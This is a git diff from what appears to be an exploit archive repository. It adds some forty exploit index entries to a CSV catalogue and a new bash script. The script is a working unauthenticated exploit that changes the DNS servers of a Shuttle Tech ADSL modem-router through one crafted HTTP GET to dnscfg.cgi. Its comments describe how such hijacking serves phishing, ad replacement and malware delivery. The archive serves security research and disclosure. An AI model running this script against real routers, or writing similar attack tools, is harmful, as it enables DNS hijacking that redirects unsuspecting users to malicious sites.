offensive-security
diff --git a/‎files.csv‎
Lines changed: 39 additions & 1 deletion b/‎files.csv‎
Lines changed: 39 additions & 1 deletion
diff --git a/‎platforms/hardware/remote/35995.sh‎
Lines changed: 90 additions & 0 deletions b/‎platforms/hardware/remote/35995.sh‎
Lines changed: 90 additions & 0 deletions
@@ -32268,6 +32268,8 @@ id,file,description,date,author,platform,type,port
 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
 35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0
+35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
+35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0
 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado  v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
 35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat  3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
@@ -32277,6 +32279,7 @@ id,file,description,date,author,platform,type,port
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
+35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80
 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0
@@ -32310,13 +32313,15 @@ id,file,description,date,author,platform,type,port
 35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection Vulnerability",2015-01-21,TranDinhTien,php,webapps,0
 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0
 35859,platforms/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash PoC",2015-01-21,"Kaczinski Ramirez",hardware,dos,0
+35860,platforms/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80
 35861,platforms/php/webapps/35861.txt,"vBTube 1.2.9 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps,0
 35862,platforms/php/webapps/35862.txt,"miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0
 35863,platforms/php/webapps/35863.php,"myBloggie 2.1.6 HTML-injection and SQL Injection Vulnerabilities",2011-06-15,"Robin Verton",php,webapps,0
 35864,platforms/windows/remote/35864.txt,"Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",windows,remote,0
 35865,platforms/php/webapps/35865.txt,"Nibbleblog Multiple SQL Injection Vulnerabilities",2011-06-19,KedAns-Dz,php,webapps,0
 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 Cross Site Scripting and SQL Injection Vulnerabilities",2011-06-18,KedAns-Dz,php,webapps,0
 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 'sitemap.php' Cross Site Scripting Vulnerability",2011-06-18,Bl4ck.Viper,php,webapps,0
+35868,platforms/linux/shellcode/35868.c,"Linux MIPS execve (36 bytes)",2015-01-22,Sanguine,linux,shellcode,0
 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption Vulnerability",2015-01-21,"Kapil Soni",windows,dos,0
 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda M. Jayathissa",windows,dos,0
 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0
@@ -32327,6 +32332,7 @@ id,file,description,date,author,platform,type,port
 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection And Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0
+35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0
 35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
 35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
 35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
@@ -32335,6 +32341,7 @@ id,file,description,date,author,platform,type,port
 35885,platforms/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 'Initialize()' Method Stack Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
 35886,platforms/windows/remote/35886.txt,"Sybase Advantage Server 10.0.0.3 'ADS' Process Off By One Buffer Overflow Vulnerability",2011-06-27,"Luigi Auriemma",windows,remote,0
 35887,platforms/hardware/remote/35887.txt,"Cisco Ironport Appliances - Privilege Escalation Vulnerability",2015-01-22,"Glafkos Charalambous ",hardware,remote,0
+35889,platforms/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash PoC",2015-01-23,"Kapil Soni",windows,dos,0
 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0
 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration Vulnerability",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080
 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 SQL Injection Vulnerability",2011-06-27,"Qihan Luo",multiple,remote,0
@@ -32357,6 +32364,7 @@ id,file,description,date,author,platform,type,port
 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0
 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen R�semann",php,webapps,80
 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
+35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
 35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0
 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
@@ -32387,18 +32395,48 @@ id,file,description,date,author,platform,type,port
 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0
 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x includes/lib/gz.php file Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0
 35947,platforms/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0
-35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,ParvezGHH,windows,local,0
+35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - Full ASLR & DEP Bypass",2015-01-30,Rh0,windows,remote,0
+35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0
+35950,platforms/php/webapps/35950.txt,"NPDS CMS Revolution-13 - SQL Injection Vulnerability",2015-01-24,"Narendra Bhati",php,webapps,80
+35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0
+35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox 'id' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
+35961,platforms/linux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",linux,remote,0
+35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
+35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection Vulnerability",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS SQL Injection Vulnerability",2011-07-17,Lazmania61,php,webapps,0
 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0
 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0
+35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0
+35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0
+35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 'snarf_ajax.php' Cross Site Scripting Vulnerability",2011-07-20,"High-Tech Bridge SA",php,webapps,0
+35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0
+35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection Vulnerability",2011-07-21,Ehsan_Hp200,php,webapps,0
+35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection Vulnerability",2011-07-25,3spi0n,php,webapps,0
+35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0
+35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection Vulnerability",2011-07-25,Lazmania61,php,webapps,0
+35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - CSRF Vulnerability",2015-02-03,"Mohamed Idris",multiple,webapps,8020
+35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080
+35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,metasploit,windows,local,0
+35984,platforms/php/webapps/35984.txt,"Joomla! Virtual Money 1.5 'com_virtualmoney' Component SQL Injection Vulnerability",2011-07-25,FL0RiX,php,webapps,0
+35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
+35989,platforms/php/webapps/35989.txt,"MBoard 1.3 'url' Parameter URI Redirection Vulnerability",2011-07-27,"High-Tech Bridge SA",php,webapps,0
+35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0
+35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen R�semann",php,webapps,80
+35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35993,platforms/windows/local/35993.c,"AVG Internet Security 2015 Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35994,platforms/windows/local/35994.c,"BullGuard Multiple Products Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
+35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0
@@ -0,0 +1,90 @@
+#!/bin/bash
+#
+#        Shuttle Tech ADSL Modem-Router 915 WM 
+#      Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
+#  http://www.ethical-hacker.org/
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Warning:
+#  My first public report on such a serious 
+#  vulnerability was ignored by the manufacturers 
+#  and were committed serious criminal deeds of 
+#  cybercriminals in Brasil. This vulnerability 
+#  could affect millions of users worldwide.
+#  http://www.exploit-db.com/exploits/16275/
+#  http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
+#  
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "             Shuttle Tech ADSL Modem-Router 915 WM" 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ================================================================"
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "                  http://www.ethical-hacker.org/"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+